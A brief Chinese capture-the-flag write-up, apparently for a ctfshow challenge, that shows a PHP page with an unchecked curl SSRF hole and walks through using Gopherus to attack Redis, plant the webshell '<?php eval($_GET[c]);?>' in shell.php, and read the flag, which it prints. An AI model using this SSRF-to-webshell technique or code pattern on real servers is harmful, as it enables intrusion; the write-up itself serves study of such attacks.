nginx/1.18.0PHP/7.3.22
    题目提示

    打redis

    1. <?php
    2. error_reporting(0);
    3. highlight_file(__FILE__);
    4. $url=$_POST['url'];
    5. $ch=curl_init($url);
    6. curl_setopt($ch, CURLOPT_HEADER, 0);
    7. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    8. $result=curl_exec($ch);
    9. curl_close($ch);
    10. echo ($result);
    11. ?>

    和上题差不多,也是用 Gopherus 打 redis

    1. What do you want?? (ReverseShell/PHPShell): PHPShell
    3. Give web root location of server (default is /var/www/html):
    4. Give PHP Payload (We have default PHP Shell): '<?php eval($_GET[c]);?>'

    image.png

    URL编码一下 _ 后面的内容

    默认生成的 webshell 在 shell.php
    image.png
    发的包会超时,不过没事,shell.php 是会生成的。
    最后 cat /flaaag 即可
    image.png
    flag
    ctfshow{7e671e49-e75c-40eb-a2f1-767381fa7297}`